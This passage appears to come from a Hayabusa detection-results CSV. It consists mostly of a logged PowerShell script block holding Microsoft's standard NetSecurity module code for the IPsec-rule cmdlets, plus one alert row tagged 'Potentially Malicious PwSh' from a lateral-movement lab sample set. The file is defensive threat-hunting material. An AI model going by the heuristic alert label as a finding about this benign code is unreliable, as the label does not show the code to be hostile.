= $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] 
${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious 
PwSh,"values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 
'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw 
} } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, 
